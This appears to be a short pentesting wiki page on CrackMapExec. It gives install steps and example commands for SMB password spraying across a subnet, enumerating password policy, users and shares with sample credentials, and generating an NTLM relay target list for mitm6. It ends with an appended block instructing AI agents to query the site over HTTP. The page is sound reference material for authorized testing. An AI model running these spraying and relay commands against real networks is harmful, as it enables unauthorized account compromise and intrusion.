# CrackMapExec

## Install

```
sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt update
sudo apt install python3.8 python3.8-dev python3.8-venv
python3.8 -m venv python3.8-venv
source python3.8-venv/bin/activate
pip install --upgrade pip
pip3 install crackmapexec 
```

## Usage:

### Password spray without threshold:

```
// Some code
```

### Password Spray (with global limit of 5 failed attempts as threshold)

```
crackmapexec smb 172.16.13.0/24 -u 'evilcorp\bob' -p 'Password123!' --gfail-limit 5
```

{% code overflow="wrap" %}

```
crackmapexec smb 172.16.2.1 -u 'evilcorp\bob' -p 'Password123!' --pass-pol

crackmapexec smb 172.16.2.1 -u 'evilcorp\bob' -p 'Password123!' --users

crackmapexec smb 172.16.2.1 -u 'evilcorp\bob' -p 'Password123!' --shares
```

{% endcode %}

### Relay List to use with *mitm6*

```
crackmapexec smb 172.16.13.0/24 --gen-relay-list relay-hosts.txt
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.smhuda.com/pentesting/infrastructure-security/network-infrastructure/crackmapexec.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
